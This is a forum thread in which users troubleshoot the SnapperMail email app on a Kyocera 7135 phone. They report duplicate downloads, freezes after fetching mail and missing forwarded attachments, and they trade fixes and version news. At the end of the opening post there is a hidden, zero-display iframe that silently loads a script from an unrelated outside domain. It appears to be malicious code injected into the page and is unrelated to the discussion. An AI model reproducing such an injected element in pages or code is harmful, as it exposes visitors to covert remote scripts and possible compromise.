+ Reply to Thread
Page 1 of 2 1 2 LastLast

New issues for me with SnapperMail on my 7135

I absolutely LOVE SnapperMail and it has worked flawlessly for the past 3 or 4 weeks that I have used it. But, just in the past week, it has developed a couple of problems...

1) After downloading a ton of emails, marking them to be deleted from the server (with an "x") and even sending them to the trah and emptying the trash, now almost everytime I fetch new mail, this huge group (10 minutes worth) of the same exact emails downloads again. Why is it doing this?

2) I have the preferences set so that it should disconnect after sending/fetching email, but for the past week, after email downloads, the led stays lit like the data call is still connected, the LCD screen on top says something like ":03 data call ended" or something and it is frozen (but NOT an inverse screen or anything). I can't even scroll up to see the new mail. It won't unfreeze and if I try to push the red button to end the call or go to phone, it and any other buttons (or even stylus taps) don't do anything since the whole thing is frozen.

So everytime I fetch new email through SnapperMail, I absolutely must do a soft reset before I can do anything else.

Is everybody having these problems with SM? Or is it just me? The strange thing is, that up until about a week ago, I didn't have these problems.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ~'kito
    pdaPhoneHome Moderator

Perhaps the trash is too full?

WIll moving marked messages to the trash cause the flag not to process on teh server side?

Dunno, but I do know the trash isn't full, because I always "Empty Trash" after sending them there. Hmmm.
    ~'kito
    pdaPhoneHome Moderator

SnapperMail has a support site at:
    http://groups.yahoo.com/group/SnapperMail

Check it out and post problems there. Will is pretty good at responding. He's also supposed to have version 1.5.1 available tomorrow.

Have you down loaded the newest release of it, on the pre-production version it's up to build 17.

The 1.5.1 version which will have more features will be available on the website in the morning.

I haven't had any problems with it myself
    Remember, When the long night comes return to the end of the beginning.

Markito - I have the same problem.

2) I have the preferences set so that it should disconnect after sending/fetching email, but for the past week, after email downloads, the led stays lit like the data call is still connected, the LCD screen on top says something like ":03 data call ended" or something and it is frozen (but NOT an inverse screen or anything). I can't even scroll up to see the new mail. It won't unfreeze and if I try to push the red button to end the call or go to phone, it and any other buttons (or even stylus taps) don't do anything since the whole thing is frozen.

Originally posted by Trey
    Markito - I have the same problem.

Have you submitted the problem to the developer yet? Sounds like another little anomoly to the 7135, although Wil seems to be very familair with the 7135. I would have thought he would have caught it if it was across the board. The Treo's were having a few problems with it for a while but even those are solved now.

I haven't seen any mentions of the problems you 2 are having on the support group forum for it.

If you have the registered version, he just relesed the newest version 1.5.1 on his website about an hour ago.
    Remember, When the long night comes return to the end of the beginning.

I was having some very similar problems... I did d/l build 17, which may have fixed the problem by itself. But I also messed with my configuration and set it to only grab the first 20 lines of each e-mail (no more unlimited Vision data for me! gotta watch my minutes!). I did e-mail Will Lau about it and he suggested build 17 and said that they have been working with their test unit 7135's extensively lately. When I was having the problem before it seemed to be only when I had a LOT of e-mails to d/l. But it seems to be fixed now
    Please visit my picture site: Robert-O-Rama :)

Unfortunately the newest upgrade of SnapperMail (released today) DIDN'T solve either of my two problems.
    ~'kito
    pdaPhoneHome Moderator

hmm
    im only on my second day of snappermail usage, but i had a thought...

could the duplicate downloading of messages be caused by checking your mail with another email program (like on your computer)?

basically, if i check two times in a row (after deleting and trashing) i dont get duplicate downloads, but i think if i check on my computer and then from snapper, i get the dups...

i have similar server deletion options set in snapper and on my mail program; delete from server in 7 days...

whaddya think?...

mike

--EDIT--

im wrong...

when i recieve an email to my aol acct (i use aol for palm os on my 7135 and it has an attatchment, i forward it to my pop3 acct and retrieve it with snappermail but the attatchment never gets forwarded, only the forwarding message. now, if i send an email directly to my pop3 acct with an attatchment things work fine and i can view and save the attatchment. what gives? this is not the way it works with dektop email, when you forward an email with an attatchment to someone, they get the message and the attatched file. am i doing something wrong or is this just not possible

Well, you can only forward what you have downloaded. Since the AOL email app doesn't download the attachement, you can't forward it.

on my desktop it doesnt work this way, i can forward the attatchment without even opening it,i guess the only thing i can do is call the sender and ask them to send another email to my pop3 acct directly.any othetr workarounds anyone can think of?

You might not open it, but when you received the email on your desktop, the attachemnt is brought down with it, hence when you forward it, the attachment goes with it.

Occasionally I have had emails not get deleted from the server with other devices, like my previous pocket PC, and the only solution was to download them with a desktop PC set to remove the files upon retrieving them, or going into the webmail interface and deleting them from there.

Sometimes it is the pop server's problem, not the email client's fault?

Larry
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

but if i forward to another aol acct from my aol palm, it shows up. the only time it doesnt show up is when it is forwarded to my pop3 accts and retrieved with snappermail. even eudora mail(which i set up today0 at least tells me that an attatchment is present, it just wont download/open it. snappermail does not even show that there was an attatchment. as a matter of fact, i cant even get it to show the forwarded message that accompanied the attatchment. its like its truncated or something but i have it sent for "entire message".if i send a email with attatchment directly to the pop3 acct it works fine, but whenever i forward it(from desktop or 7135) its not there

Re: New issues for me with SnapperMail on my 7135

Originally posted by Markito
    I absolutely LOVE SnapperMail and it has worked flawlessly for the past 3 or 4 weeks that I have used it. But, just in the past week, it has developed a couple of problems...

1) After downloading a ton of emails, marking them to be deleted from the server (with an "x") and even sending them to the trah and emptying the trash, now almost everytime I fetch new mail, this huge group (10 minutes worth) of the same exact emails downloads again. Why is it doing this?

So everytime I fetch new email through SnapperMail, I absolutely must do a soft reset before I can do anything else.

Is everybody having these problems with SM? Or is it just me? The strange thing is, that up until about a week ago, I didn't have these problems.
    Strange but true, I haven't experienced either of these problems in the past few weeks.

I think my problem with #2 was that I was trying to get at (tap) my new emails before waiting for it to chirp/announce their arrival and to end the call.

Life is very good for me in SnapperLand.
    ~'kito
    pdaPhoneHome Moderator

Re: Re: New issues for me with SnapperMail on my 7135

Originally posted by Markito
    Strange but true, I haven't experienced either of these problems in the past few weeks.

I think my problem with #2 was that I was trying to get at (tap) my new emails before waiting for it to chirp/announce their arrival and to end the call.

Life is very good for me in SnapperLand.
    Good! My only remaining problem is that when I a lot of e-mails in one d/l (more than 20 seems to be around where it starts) I have to do a soft reset sometimes because it freezes.
    Please visit my picture site: Robert-O-Rama :)

Well, after trying the snappermail demo that came with quickoffice premier I was impressed, and bought snapper mail.

Now I have an intermittant problem #2 with version "1.5.1 build 2" just downloaded Thursday and registered.

I just downloaded 6 emails and it worked fine, but with larger numbers it seems to get stuck. If you reset, then some of the emails on the server don't get marked as read, and get re-downloaded the next time you check the mail.

Do we like have to let it sit for 10-15 minutes connected to the net before it disconnects and announces new mail, or is there some other solution to the apparent freeze of the 7135?

I will report this to snappermail...
    Larry Ganz

Just downloaded version 1.604 and will try it when I get my next hotsync done!!

Larry
    Larry Ganz